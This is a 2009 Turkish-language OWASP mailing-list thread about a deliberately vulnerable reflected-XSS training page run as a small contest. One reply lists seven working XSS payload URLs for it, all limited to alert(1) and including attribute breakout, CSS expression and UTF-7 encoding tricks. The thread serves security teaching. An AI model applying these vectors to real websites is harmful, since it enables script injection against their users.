[Owasp-turkey] Reflected XSS Oyun Grubu ve Yarisma

Bedirhan Urgun bedirhanurgun at gmail.com
Tue Jun 16 07:54:19 EDT 2009


Uygulamayi ipuclarini da icerecek sekilde update ettim.

http://www.webguvenligi.org/xsstb/reflected.php



16 Haziran 2009 Salı 09:30 tarihinde Huzeyfe ONAL <huzeyfe at lifeoverip.net>yazdı:

> Selamlar,
>
>
> benim default ayarlarla denedigim birkac arac da bazilarini bulamadi. Bu
> aslinda otomatize araclarin/yontemlerin ne kadar efektif olabilecegini
> gostermesi acisindan onemli bir calisma.
>
> Ama buradaki xss'lerin gunumuz uygulamalarinda bulunma orani da cok onemli.
> Yani %1 bulunacak bir ihtimal icin bir dunya ek calisma yapmak istemiyordur
> arac yazarlari.
>
>
>
> ---
> Huzeyfe ONAL
> Ag Guvenligi Listesine uye oldunuz mu?
> http://blog.lifeoverip.net/netsec-listesi/
>
> ---
>
>
> 2009/6/16 Bedirhan Urgun <bedirhanurgun at gmail.com>
>
>>   tesekkurler Sertan. Tebrik ederim, referansli aciklamalarin ozellikle
>> cok faydali. Cagdas ile adreslerinizi bana ozel gonderebilirseniz hediyeleri
>> gonderecegim.
>>
>> Bu arada hepsini bulan (false-positive olmayacak sekilde)
>> otomatik uygulama varsa bildiginiz merak ediyorum. Benim denediklerim de
>> mutlaka 1-2 (hatta bazen 3) eksik cikiyor.
>>
>> 16 Haziran 2009 Salı 00:23 tarihinde Sertan Kolat <
>> sertan at mlists.olympos.org> yazdı:
>>
>>  Merhaba,
>>>
>>>
>>> Cok guzel uygulama, elinize saglik.
>>>
>>>
>>> 1) (FF3) http://www.webguvenligi.org/xsstb/reflected.php?vector1=
>>> <script>alert(1)</script>a
>>>
>>> 2) (FF3) http://www.webguvenligi.org/xsstb/reflected.php?vector2=
>>> "><script>alert(1)</script>a
>>>
>>> 3) (IE6)
>>> http://www.webguvenligi.org/xsstb/reflected.php?vector3=background-image:url(javascript:alert(1))<http://www.webguvenligi.org/xsstb/reflected.php?vector3=background-image:url%28javascript:alert%281%29%29>
>>>
>>> veya (IE8)
>>> http://www.webguvenligi.org/xsstb/reflected.php?vector3=width:expression(alert(1))<http://www.webguvenligi.org/xsstb/reflected.php?vector3=width:expression%28alert%281%29%29>
>>> ;
>>>
>>> 4) (FF3)
>>> http://www.webguvenligi.org/xsstb/reflected.php?vector4=%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E<http://www.webguvenligi.org/xsstb/reflected.php?vector4=%3C/script%3E%3Cscript%3Ealert%281%29;%3C/script%3E>
>>>
>>> 5) (FF3)
>>> http://www.webguvenligi.org/xsstb/reflected.php?vector5=%3Ciframe%20src=javascript:alert(1)%3E<http://www.webguvenligi.org/xsstb/reflected.php?vector5=%3Ciframe%20src=javascript:alert%281%29%3E>
>>>
>>> 6) (IE7, encoding auto-select[1])
>>> http://www.webguvenligi.org/xsstb/reflected.php?vector6=%2bADw-script%2bAD4-%0d%0aalert(1)%2bADw-%2fscript%2bAD4-<http://www.webguvenligi.org/xsstb/reflected.php?vector6=%2bADw-script%2bAD4-%0d%0aalert%281%29%2bADw-%2fscript%2bAD4->
>>>
>>> 7) (IE6)
>>> http://www.webguvenligi.org/xsstb/reflected.php?vector7=blue;background-image:url(javascript:alert(1))<http://www.webguvenligi.org/xsstb/reflected.php?vector7=blue;background-image:url%28javascript:alert%281%29%29>
>>>
>>>
>>>
>>> [1] IE charset encoding Auto-Selection:
>>>
>>> If 'Encoding' is set to 'Auto-Select', and Internet-Explorer finds a
>>> UTF-7 string in the first 4096 characters of the response's body, it will
>>> set the charset encoding to UTF-7 automatically, unless a certain charset
>>> encoding is already enforced.
>>>
>>>
>>>
>>> Sertan Kolat
>>>
>>>
>>> On Monday, June 15, 2009, 1:06:17 PM, you wrote:
>>>
>>>  Merhaba,
>>>
>>> Farklı Reflected XSS tekniklerini öğrenip uygulayabileceğiniz bir "oyun
>>> grubu" uygulamasına http://www.webguvenligi.org/xsstb/reflected.php
>>>  eriÅŸebilirsiniz.
>>>
>>> Uygulamada 7 parametreye (vector1, vector2, ..., vector7) uygulanabilecek
>>> xss saldiri vektorleri var. Bu vektorleri exploit ederek, bu maile reply-all
>>> olarak asagida verdigim link gibi gonderen ilk iki kisye;
>>>
>>>
>>>
>>> 1inciye Maldivler'e 2 kisilik 7 gun 7 gece seyehat
>>>
>>> 2inciye Son model araba
>>>
>>>
>>>
>>> Yok daha neler!...
>>>
>>>
>>>
>>> 1inciye OWASP Membership T-Shirt'u (L)
>>>
>>> 2inciye OWASP Membership DVD'si
>>>
>>>
>>>
>>> gonderecegim.
>>>
>>>
>>>
>>> Ornek; (birinci tuyo benden)
>>>
>>>
>>> http://www.webguvenligi.org/xsstb/reflected.php?vector1=%3Cscript%3Ealert(1)%3C/script%3E<http://www.webguvenligi.org/xsstb/reflected.php?vector1=%3Cscript%3Ealert%281%29%3C/script%3E>
>>>
>>>
>>>
>>>
>>>
>>> Not 1: ekrana alert kutucugu icionde 1 yazdirmak yeterli
>>>
>>> Not 2: onemli olan owasp-tr mail arsivlerine dusme sirasi
>>>
>>> Not 3: en son yazdigim hediyeler gecerli! sonra "vay ben gormedim"
>>> olmasin
>>>
>>>
>>>
>>> Proje Post'u:
>>> http://www.webguvenligi.org/projeler/reflected-xss-oyun-grubu.html
>>>
>>> --
>>>
>>> Bedirhan Urgun
>>>
>>> http://www.webguvenligi.org
>>>
>>> http://www.owasp.org/index.php/Turkey
>>>
>>>
>>> Türkçe Web Uygulama Güvenliği E-Posta Listesine üye olmak için:
>>>
>>> https://lists.owasp.org/mailman/listinfo/owasp-turkey
>>>
>>
>>
>>
>> --
>>  Bedirhan Urgun
>> http://www.webguvenligi.org
>> http://www.owasp.org/index.php/Turkey
>>
>> Türkçe Web Uygulama Güvenliği E-Posta Listesine üye olmak için:
>> https://lists.owasp.org/mailman/listinfo/owasp-turkey
>>
>> _______________________________________________
>> Owasp-turkey mailing list
>> Owasp-turkey at lists.owasp.org
>> https://lists.owasp.org/mailman/listinfo/owasp-turkey
>>
>>
>
> _______________________________________________
> Owasp-turkey mailing list
> Owasp-turkey at lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-turkey
>
>


-- 
Bedirhan Urgun
http://www.webguvenligi.org
http://www.owasp.org/index.php/Turkey

Türkçe Web Uygulama Güvenliği E-Posta Listesine üye olmak için:
https://lists.owasp.org/mailman/listinfo/owasp-turkey
-------------- sonraki bölüm --------------
Bir HTML eklentisi temizlendi...
URL: https://lists.owasp.org/pipermail/owasp-turkey/attachments/20090616/c50c3f9c/attachment.html 


More information about the Owasp-turkey mailing list